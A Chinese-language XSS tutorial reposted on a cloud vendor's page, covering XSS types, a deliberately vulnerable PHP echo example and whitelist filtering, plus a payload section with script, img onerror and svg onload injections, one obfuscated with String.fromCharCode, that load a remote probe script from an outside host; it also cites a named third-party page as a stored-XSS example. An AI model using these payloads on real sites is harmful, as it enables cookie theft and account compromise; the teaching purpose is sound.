温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

XSS漏洞分析

发布时间:2020-06-30 10:18:44 来源:网络 阅读:841 作者:nw01f 栏目:安全技术


  • 什么是XSS


    • 跨站脚本***(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本***缩写为XSS。恶意***者往web页面里插入而已html代码,当浏览该页之时,嵌入其中web里面的html代码会被执行,从而达到而已***用户的特殊目的。

  • XSS可以干什么


    • 盗取管理员Cookie或用户Cookie

    • XSS Worm

    • 挂马(水坑***)

    • 有局限性的键盘记录

  • XSS分类


    • 放射性XSS

    • 存储型XSS

    • DOM XSS

    • flash XSS

    • mXSS

  • 反射(非持久)型XSS


    • 发出请求时,XSS代码出现在URL中,最后输入提交到服务器,服务器解析后响应在响应内容中出现这段XSS代码,最后浏览器解析执行

    • 这个过程就像一次反射,所以命名为反射性XSS

xss.php
<?php
     echo $_GET['x']
?>
#提交
/xss.php?x=<script>alert(1)</script>
  • 服务端解析式,echo就会完整的输出<script>alert(1)</script>到响应体中,然后浏览器解析执行触发弹窗

  • 储存(持久)型XSS


    • 储存型XSS和反射型XSS的差别仅在于:提交的XSS代码会储存在服务器(不管是数据库/内存/文件系统等),下次请求目标页面是不用在提交XSS代码。

    • 最典型的例子就是留言板XSS,用户提交一条包含XSS代码的留言储存到数据库中,目标用户查看留言板是,那些留言内容会从数据库查村出来并显示,浏览器发现有XSS代码,就当作正常的HTML和JS解析执行,于是触发了XSS***

    • 储存性XSS的***是最隐蔽的

#eg:http://www.nfpeople.com/user.php?id=21839
  • XSS是如何利用的

    • payload(有效的***代码)

<script src='http://b.ioio.pub/xss/probe.js'></script>

<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>

<svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>

<svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >
  • 修复

    • 对XSS的防御需要根据实际情况对用户的输入进行严格的过滤。基于过滤的XSS防御方式通常可分为两种:基于黑名单的过滤和基于白名单的过滤。后者的防御效果往往更好,对于用户在白名单之外的输入,可以直接忽略。在构造白名单的过程中需要保证在不影响用户体验的同时,尽可能杜绝一切不必要的输入内容。


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI